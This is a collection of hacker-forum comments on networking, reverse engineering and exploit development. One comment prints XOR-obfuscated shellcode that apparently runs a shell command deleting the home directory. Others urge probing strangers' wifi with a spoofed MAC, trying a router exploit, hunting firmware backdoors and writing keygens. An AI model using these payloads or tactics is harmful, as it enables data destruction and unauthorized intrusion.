int0x80

No multithreaded no care.

If your goal is to find your path out to the uplink, you can just use traceroute, or " " as some next gen hax0rs say.Is the AP kicking you over to the 10.10.10.x net after you 'authenticate'? I would pull an IP, nmap the subnet before authenticating. Then authenticate, check your IP address, and nmap the new subnet if your IP has changed. Then do a battle roll, shop da whops, and under 9000.

dat_google.jpg http://synshop.org/wiki/ https://twitter.com/#!/syn_shop

Make keygens, who cares. For local auth schemes, all the code is right there. There may be some protection/obfuscation/compression/encryption to protect the key algorithm, but the fact is you have all the code. So the whole key (lol) is to understand the algorithm and re-implement it in your keygen. This is typically done by using common reverse engineering tools; most often a debugger and disassembler. Everyone has their own preferences, though IDA tends to be the du jour disassembler. Anyways, with local auth schemes, you have the lock and the key -- this is why DRM is such a fail; defective by design.

It's alright. From a technical standpoint, there are many contradictions. They make the IT guys out to be nerds, but then they are dumb as hell. However, the actors do have some shining moments in playing the roles quite well. Bonuses for EFF and MC Frontalot paraphernalia. Additional bonus for being a BBC show and having more than 11 episodes: Achievement Unlocked.

As an alternative, have you considered teaching a free home computer security class at your local library or hackerspace? We offer classes at Hive13 all the time. There are a number of benefits to this approach: 1. You help people (though you might be saying "bfd"). 2. You have a conversation piece for job interviews and college applications that shows you do something useful with your time outside of school. Employers and colleges eat that stuff up. 3. People will know you as a helpful person and will call you to help them fix their computers/networks, for which you charge them. I strongly recommend creating an official business (I have an LLC) before any money starts changing hands. It's easy and inexpensive to set up, and can limit your liability and losses in the event that something goes horribly awry.

Prepare for bad reactions. This reminds me of a story with some kids from my city. I may be off on the details as it was a while back. IIRC, these kids won the WiFi Shootout at Defcon; then went around town finding APs with insecure configurations. They would then go ring the doorbell and offer consulting services to secure the network. People freaked out and the kids got no business; and I believe they were threatened with legal action on more than one occasion. It seems people will probably consider this as a personal attack, even though it's not intended that way. Here is the 2004 Wired article about them winning the WiFi Shootout -- http://www.wired.com/culture/lifestyle/news/2004/08/64440

Do internet stuff from a VM snapshot and always revert.

So glad our country is burning cycles to solve real problems.

Can you bridge the NICs in your gateway box and insert it inline between the AP and modem? I did this with the first firewalls I built; one was OpenBSD with pf, the other was Linux with grsec/PaX/ebtables/iptables. This is fine for locking your front door, but what happens if Aurora Borealis breaks out in your kitchen?

fdupes

Lots of different aspects here, but I will mention this: Some job descriptions list that a particular degree is required. If your resume doesn't list that degree, HR throws out your resume, regardless if you're qualified. Take a look at job postings you consider interesting and note the education requirements. I have a BS in Computer Science, and it has served me fine.

You're out of luck if other people use the same proxies for the same service and get the proxy IP addresses b&. The IP addresses you posted are different, so perhaps other people have beat you to the punch.

One time, I accidentally the whole database. Also yes, some routers do ship with dd-wrt :)

Set a watch on priGroup. In the code from your post, the only place that member gets modified is in Square::setGroupArray, so also consider placing a breakpoint on that method and see how/where it gets called. HTH :)

COPY THAT FLOPPY? Y/N

Randomize the MAC address on your wifi interface, go to other apartment complexes and places with wifi, and start seeing what you can find.

Seconding gcc via MinGW.

Github and Google Code are two popular venues for hosting FOSS projects. As for licensing, there are a variety of FOSS licenses that include attribution, take your pick :]

Run BT5 live via DVD-R and remove the HDD before con. There are other places to store code, but you've removed the most common platforms for persistence mechanisms thereby eliminating most of the threat.

I recently added Backtrack to my PXE setup at home. Asserting you already have a working PXE setup with NFS, my tftp root is at /store/tftpboot. 0. Create Backtrack PXE directories: mkdir -p /store/tftpboot/backtrack/5/R1/x{86,64}/{kde,gnome} 1. Mount iso and copy contents to PXE Backtrack directory: sudo mount -o loop,ro -t iso9660 BT5R1-KDE-32.iso /mnt cp -av /mnt/* /store/tftpboot/backtrack/5/R1/x86/kde/ umount /mnt Repeat as needed for other permutations. 2. Add exports to NFS: # /etc/exports /store/tftpboot/backtrack/5/R1/x64/kde 192.168.1.0/24(ro,sync,no_subtree_check) /store/tftpboot/backtrack/5/R1/x86/kde 192.168.1.0/24(ro,sync,no_subtree_check) Repeat as needed for other permutations. 3. Create a backtrack.menu file for PXE: LABEL 21 MENU LABEL Backtrack 5 R1 x86 KDE KERNEL /backtrack/5/R1/x86/kde/casper/vmlinuz APPEND initrd=/backtrack/5/R1/x86/kde/casper/initrd.gz boot=casper text vga=789 netboot=nfs nfsroot=your.LAN.IP.addr:/store/tftpboot/backtrack/5/R1/x86/kde TEXT HELP Boot the Backtrack 5 R1 x86 KDE Live CD ENDTEXT LABEL 22 MENU LABEL Backtrack 5 R1 x64 KDE KERNEL /backtrack/5/R1/x64/kde/casper/vmlinuz APPEND initrd=/backtrack/5/R1/x64/kde/casper/initrd.gz boot=casper text vga=789 netboot=nfs nfsroot=your.LAN.IP.addr:/store/tftpboot/backtrack/5/R1/x64/kde TEXT HELP Boot the Backtrack 5 R1 x64 KDE Live CD ENDTEXT Repeat as needed for other permutations. 4. Add the Backtrack menu into your pxelinux.cfg/default: MENU BEGIN Backtrack MENU TITLE Backtrack LABEL Previous MENU LABEL Previous Menu TEXT HELP Return to previous menu ENDTEXT MENU EXIT MENU SEPARATOR MENU INCLUDE backtrack/backtrack.menu MENU END Restart your nfs and tftp daemons and you should be good to go. SJ every day.

Give the HNAP exploit a try at least, unless your firmware is 1.33NA or newer (fixed 01/28/2010). Here are a list of strings in the .bin that's compressed in the firmware image: http://slexy.org/view/s2iTxmDC7j Sometimes routers have backdoor admin accounts, you may get lucky looking through the strings.

Executables are more complex than just the byte code instructions. When you load and execute a binary, it is already running in memory. So why would you need to "convert it to shellcode" to run it in memory?

This is not smc so it is pretty easy: $ echo -en "\xb8\xff\x2f\x73\x68\xc1\xe8\x08\x50\xb8\x2f\x62\x69\x6e\x50\x89\xe3\x31\xc0\x50\x66\xb8\x71\x71\x66\x35\x51\x51\x66\x50\xb8\x23\x37\x71\x2f\x35\x51\x51\x51\x51\x50\xb8\x23\x3c\x71\x7c\x35\x51\x51\x51\x51\x50\x89\xe1\x31\xc0\x50\x66\xb8\x2d\x63\x66\x50\x89\xe2\x31\xc0\xb0\x64\x29\xc4\x31\xc0\x50\x51\x52\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xb4\x01\x31\xdb\xcd\x80" | ndisasm -u - 00000000 B8FF2F7368 mov eax,0x68732fff 00000005 C1E808 shr eax,0x8 00000008 50 push eax 00000009 B82F62696E mov eax,0x6e69622f 0000000E 50 push eax 0000000F 89E3 mov ebx,esp 00000011 31C0 xor eax,eax 00000013 50 push eax 00000014 66B87171 mov ax,0x7171 00000018 66355151 xor ax,0x5151 0000001C 6650 push ax 0000001E B82337712F mov eax,0x2f713723 00000023 3551515151 xor eax,0x51515151 00000028 50 push eax 00000029 B8233C717C mov eax,0x7c713c23 0000002E 3551515151 xor eax,0x51515151 00000033 50 push eax 00000034 89E1 mov ecx,esp 00000036 31C0 xor eax,eax 00000038 50 push eax 00000039 66B82D63 mov ax,0x632d 0000003D 6650 push ax 0000003F 89E2 mov edx,esp 00000041 31C0 xor eax,eax 00000043 B064 mov al,0x64 00000045 29C4 sub esp,eax 00000047 31C0 xor eax,eax 00000049 50 push eax 0000004A 51 push ecx 0000004B 52 push edx 0000004C 53 push ebx 0000004D 89E1 mov ecx,esp 0000004F 31D2 xor edx,edx 00000051 31C0 xor eax,eax 00000053 B00B mov al,0xb 00000055 CD80 int 0x80 00000057 B401 mov ah,0x1 00000059 31DB xor ebx,ebx 0000005B CD80 int 0x80 Let me know if you need more help.

Welcome! Sorry for a short reply, I have over 9000 reasons why it's not awesome but hopefully it can get you over a hurdle. 1. How does the JMP ESP address from a non-ASLR dll help use execute shellcode? If your payload is at the top of the stack (esp), then a jmp esp will direct execution to your payload. 2. Why do we need to pack the EIP address in little endian format? In x86, all data types bigger than a word are expressed in little endian. 3. How do we know how many NOPs to use in our sled? Use pattern_create.rb and pattern_offset.rb to find total size, subtract out payload and anything else you need to overwrite (addresses, etc). Just arithmetic. 4. What is the proper method for over writing SEH and hiding our shellcode somewhere else? Check out both parts of section 3 of the Corelan win32 exploit series: https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/ https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/ Sorry I don't have time to go more into detail, but you seem like a self-starter so I think you'll be alright :] Best of luck, and I wish you shells a-plenty.